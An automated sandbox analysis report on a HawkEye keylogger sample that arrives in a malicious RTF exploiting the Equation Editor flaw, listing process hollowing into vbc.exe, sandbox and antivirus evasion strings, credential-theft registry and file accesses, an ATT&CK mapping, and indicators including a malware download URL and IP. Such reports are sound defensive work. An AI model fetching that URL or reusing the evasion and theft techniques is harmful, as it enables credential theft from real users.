Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match

File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\izux978537.scr

WMI Queries: IWbemServices::ExecQuery - SELECT MacAddress FROM Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Thread delayed: delay time: 600000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604	Thread sleep time: -120000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1980	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2244	Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2244	Thread sleep time: -105000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2052	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900	Thread sleep count: 107 > 30
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900	Thread sleep time: -107000s >= -30000s

Source: C:\Users\user\AppData\Roaming\izux978537.scr

WMI Queries: IWbemServices::ExecQuery - SELECT ProcessorId FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00404841 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs

Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Users\user\AppData\Roaming\izux978537.scr base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 7EFDE008
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 7EFDE008

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'

Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Queries volume information: C:\Users\user\AppData\Roaming\izux978537.scr VolumeInformation
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Queries volume information: C:\Users\user\AppData\Roaming\izux978537.scr VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00406282 GetVersionExA,

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: bdagent.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: MSASCui.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avguard.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avgrsx.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avcenter.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: zlclient.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avgcsrvx.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avgnt.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: hijackthis.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avgui.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: avgwdsvc.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: mbam.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: MsMpEng.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: ComboFix.exe

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match	File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE

Yara detected M00nD3v Logger

Show sources

Source: Yara match	File source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY

Yara detected MailPassView

Show sources

Source: Yara match	File source: 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2226541368.0000000004335000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2376684630.0000000002C3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2376638694.0000000002C1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2378260409.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2378154261.0000000002D45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1492, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 948, type: MEMORY
Source: Yara match	File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match	File source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Searches for Windows Mail specific files

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\izux978537.scr

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Directory queried: number of queries: 1002

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp

String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_LoopPasswordStealer_KeyStrokeLogger_EmptyKeyStroke_ClipboardLogger_EmptyClipboard_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match	File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE

Yara detected M00nD3v Logger

Show sources

Source: Yara match	File source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation111	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	Account Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	Process Injection412	Deobfuscate/Decode Files or Information11	Credentials in Registry2	File and Directory Discovery13	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Credentials In Files1	System Information Discovery15	SMB/Windows Admin Shares	Email Collection2	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution13	Logon Script (Mac)	Logon Script (Mac)	Software Packing11	NTDS	Security Software Discovery22	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol22	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection412	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SWIFT.doc	44%	Virustotal		Browse
SWIFT.doc	48%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.0.izux978537.scr.bc0000.0.unpack	100%	Avira	HEUR/AGEN.1100765	Download File
6.2.izux978537.scr.bc0000.0.unpack	100%	Avira	HEUR/AGEN.1100765	Download File
9.2.izux978537.scr.bc0000.2.unpack	100%	Avira	HEUR/AGEN.1100765	Download File
4.0.izux978537.scr.bc0000.0.unpack	100%	Avira	HEUR/AGEN.1100765	Download File
9.2.izux978537.scr.400000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.0.izux978537.scr.bc0000.0.unpack	100%	Avira	HEUR/AGEN.1100765	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://mangero.ga/izux/hktestfile.scr	100%	Avira URL Cloud	malware
https://a.pomf.cat/	0%	Avira URL Cloud	safe
http://pomf.cat/upload.php&https://a.pomf.cat/	0%	Avira URL Cloud	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://pomf.cat/upload.php	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll;HawkEye	0%	Avira URL Cloud	safe
http://pomf.cat/upload.phpCContent-Disposition:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mangero.ga	46.173.221.33	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mangero.ga/izux/hktestfile.scr	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	hktestfile[1].scr.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
